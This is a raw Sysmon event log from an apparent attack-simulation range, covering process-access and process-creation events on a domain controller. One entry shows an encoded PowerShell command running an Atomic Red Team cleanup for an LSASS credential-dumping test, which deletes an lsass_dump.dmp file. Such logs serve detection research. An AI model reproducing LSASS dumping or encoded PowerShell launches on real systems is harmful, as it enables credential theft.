15:53:06.805{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006162Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.805{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006161Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.805{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006160Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.805{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006159Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.805{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006158Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.805{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CE2-5FA1-5101-000000008801}2524C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006157Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.805{D28789B6-7CDA-5FA1-0E01-000000008801}15924444C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CE2-5FA1-5101-000000008801}2524C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006156Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.806{D28789B6-7CE2-5FA1-5101-000000008801}2524C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006155Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.789{D28789B6-7CE0-5FA1-3001-000000008801}47404528C:\Windows\system32\conhost.exe{D28789B6-7CE2-5FA1-5001-000000008801}4736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006154Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.789{D28789B6-7CE1-5FA1-4001-000000008801}48042868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CE2-5FA1-5001-000000008801}4736C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD7813) 10341000x80000000000000006153Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.789{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006152Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.789{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006151Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.789{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006150Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.789{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006149Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.789{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006148Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.789{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006147Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.789{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006146Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.789{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006145Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.789{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006144Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.789{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CE2-5FA1-5001-000000008801}4736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006143Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.789{D28789B6-7CE1-5FA1-4001-000000008801}48042868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CE2-5FA1-5001-000000008801}4736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f0374a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f035be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f85dea(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30efc1a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+319b5399(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ec499e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f22e6d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f06363(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ef82e8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f31478(wow64) 154100x80000000000000006142Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.801{D28789B6-7CE2-5FA1-5001-000000008801}4736C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "del "C:\Windows\Temp\lsass_dump.dmp" >nul 2> nul" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CE0-5FA1-AF9E-0B0000000000}0xb9eaf0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CE1-5FA1-4001-000000008801}4804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEMAbABlAGEAbgB1AHAA 10341000x80000000000000006141Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.773{D28789B6-7CE1-5FA1-4001-000000008801}48042868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CE2-5FA1-4F01-000000008801}4772C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD7813) 10341000x80000000000000006140Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.773{D28789B6-7CE0-5FA1-3001-000000008801}47404528C:\Windows\system32\conhost.exe{D28789B6-7CE2-5FA1-4F01-000000008801}4772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006139Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 